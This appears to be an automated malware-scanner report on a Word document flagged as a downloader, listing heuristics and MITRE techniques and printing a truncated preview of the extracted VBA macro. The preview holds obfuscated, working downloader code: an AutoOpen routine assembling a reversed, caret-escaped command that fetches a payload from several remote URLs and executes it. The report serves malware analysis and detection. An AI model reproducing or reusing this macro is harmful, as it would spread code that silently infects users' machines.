MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is used to execute a command-line utility, likely for downloading and executing a second-stage payload. The ClamAV heuristic also flags it as a downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Nastjencro-6682581-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Nastjencro-6682581-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5008 bytes |
SHA-256: d8f556930e6c793036d26fb49c90f3387fff19b3b3c3042e8014e2d3f6d7ebab |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FqbciqGtwBwuc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set utbfpj = djuwo
Set nWNOpc = wczszW
Set iMqKWn = JBXdd
Set OiELWi = Oowmv
Set msNHrL = MHWzM
Set tkhNw = zXjnTE
Shell VzqHBzaQj + vXzqHfWOzF + BJuTjjKtKmH + vjaBJVlraMN, Format(0)
Set cwCUjB = RXvwD
Set BbhNJI = jnorb
End Sub
Attribute VB_Name = "nbwhzlh"
Function VzqHBzaQj()
On _
Error _
Resume _
Next
Set csHou = wtOsjC
Set bnObDw = owpWF
Set OnWZVr = jUXtD
Set HZBYT = oAsczk
jwJqCmH = Format(Chr(12 + 7 + 7 + 18 + 55)) + "md " + "/V:/" + Format(Chr(8 + 4 + 4 + 12 + 39)) + Format(Chr(3 + 2 + 2 + 5 + 22)) + "s^e^" + "t " + "w^uj^2=" + " ^ " + " ^ ^ "
Set RSoJOf = VHjCIr
Set hzKzjX = wmhvNu
Set lLinDF = uXtjD
Set QjwjBu = ZjIZcT
qKmrSiwEG = "^" + " ^ " + "^ " + " ^ ^" + " ^ }^" + "}" + "{h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^t^"
Set Rjbfv = ZEQlcF
Set zTuHV = wjtzd
ijpsLadNiz = "a" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^}^" + ";" + "^ka^er^" + "b;" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn^$" + " m^e^" + "tI-" + "^e^k^" + "ovn^I" + ";)" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn$ " + ",^j^Sa" + "$(^el" + "^i^"
Set OalDS = bAcOw
Set sQPRs = aIFiMf
Set lmbCi = zqqAZ
Set iwrfKv = GQihlZ
okwNakOZ = "Fd^a^" + "oln^" + "w" + "o^D." + "r" + "^" + "ij${" + "yrt{"
Set rZXrj = NAMNPG
PGHmkbHEXpN = ")wN^s" + "$ ni jS" + "^" + "a^$(h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "a" + "^er" + "of;" + "'e^x^"
Set sFCvJ = CBkjO
Set tRJFi = waBvAo
Set TwfoEq = pfWJH
Set XnKUVF = uEKXU
bjqivt = "e" + ".'^+^w^" + "w^" + "H$+^'\" + "^'+" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "i^l" + "^b" + "u" + "p^:vn^" + "e^$^="
Set JCHYWj = FrJdt
itzqfNc = Format(Chr(12 + 7 + 7 + 18 + 55)) + "^Q" + "n$^;^'9" + "^81^' ^" + "= w^w^H" + "^$^;" + ")'@^'" + "(t" + "il^p^" + "S^" + ".^'" + "^" + "8"
Set wamKDN = fSfjYs
Set kPazV = BjYFS
Set KrLDI = NzhQl
Set WotnK = kaZNS
sdFSrdHqO = "X^D^" + "JJ^E^" + "U" + "^Y^x/^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^.^" + "h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "et^-s" + "ni" + "^m//^:p"
Set urNEk = SUaTjP
Set UCzpT = wNqlvG
Set ldswsA = FUMAw
KvEzDXrW = "t^t^h@O" + "^EMu^" + "e" + "7^p" + "^" + "Tr" + "/^kd^"
Set ZGulc = XOdnS
Set BcJiha = zakXap
pdskkb = ".^8^" + "1^0^2g" + "^o^f" + "n//^" + ":ptt" + "^h@"
VzqHBzaQj = jwJqCmH + qKmrSiwEG + ijpsLadNiz + okwNakOZ + PGHmkbHEXpN + bjqivt + itzqfNc + sdFSrdHqO + KvEzDXrW + pdskkb
Set TFMiiR = dJitZ
Set pVrwzQ = AUVlOP
Set ZjlEr = VQfSQ
Set XLnso = oRbXik
Set KLpVi = bztEJ
End Function
Function vXzqHfWOzF()
On _
Error _
Resume _
Next
Set wJCUuu = Eqwin
Set RjiwrU = OtzSo
Set cwwuk = wkBpwp
iDjDmfJFat = "n^y5Rz" + "^d^w/" + "^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + ".d^er"
Set hziND = zKbvGf
Set DBFPK = tAnDLb
Set tBCMMs = zobbJ
Set VzdEOU = orawYc
PpwsXOW = "a^" + "uqs" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "n//:p^" + "tth" + "@^INv^" + "9" + "nb" + "ggZ^H" + "/^m^" + "o" + Format(Chr(12 + 7 + 7 + 18 + 55))
Set CbKRRZ = tTrEDN
Set AwIfoZ = MMkEJ
Set nQinN = zzLUv
TnYcpYli = "." + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "u^hphna" + "^h" + "rm//^:" + "^p^tth^" + "@^l^Wa" + "3" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "RJK/"
Set bIwzmj = pMZZB
Set XQtbNm = ZUCXBv
Set hMPRff = aQzEnA
Set TcORfz = naCwJ
Set khpVpw = dwpQNv
Set MikCd = fpFFw
KaIjzvip = "^t^en.n" + "e^wi^" + "l^yrra" + "h//" + "^"
Set jPtGMC = qTaPKZ
UQGYAM = ":^p^t" + "t^h'=wN" + "^s^$;t" + "nei^l" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "^" + "b^e^" + "W^.te" + "N^ t" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "e" + "j^b^o-^" + "w^en=r^" + "ij" + "^$" + " l^leh" + "sr^ew^o"
Set AmZLM = oQrcoh
Set dAMzcJ = uijilu
Set nbnWr = XG
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.